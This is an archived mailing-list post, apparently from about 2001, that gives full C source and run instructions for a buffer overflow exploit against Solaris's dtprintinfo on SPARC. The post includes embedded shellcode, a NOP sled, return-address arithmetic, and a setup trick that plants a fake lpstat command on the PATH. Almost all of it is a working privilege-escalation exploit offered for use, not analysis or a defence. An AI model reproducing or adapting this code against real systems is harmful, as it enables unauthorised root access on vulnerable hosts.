Sorry, I forgot to to write the following things... Before execution of dtprintinfo exploit, please make a dummy lpstat command. for example, % cat > lpstat echo "system for lpprn: server.com" ^D % chmod 755 lpstat % setenv PATH .:$PATH % gcc ex_dtprintinfo.c % a.out Following exploit program is for Sparc Solaris. I tested on Solaris2.6. /*======================================================================== ex_dtprintinfo.c Overflow Exploits( for Sparc Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4that_private) ========================================================================= */ #define ADJUST 0 #define OFFSET 1144 #define STARTADR 724 #define BUFSIZE 900 #define NOP 0xa61cc013 static char x[1000]; unsigned long ret_adr; int i; char exploit_code[] = "\x82\x10\x20\x17\x91\xd0\x20\x08" "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } main() { putenv("LANG="); for (i = 0; i < ADJUST; i++) x[i]=0x11; for (i = ADJUST; i < 900; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i]; ret_adr=get_sp()-OFFSET; printf("jumping address : %lx\n",ret_adr); if ((ret_adr & 0xff) ==0 ){ ret_adr -=16; printf("New jumping address : %lx\n",ret_adr); } for (i = ADJUST; i < 600 ; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE]=0; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0); } The Shadow Penguin Security (http://base.oc.to/skyscraper/byte/551) UNYUN (unewn4that_private) ____________________________________________________________________ Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:45:30 PDT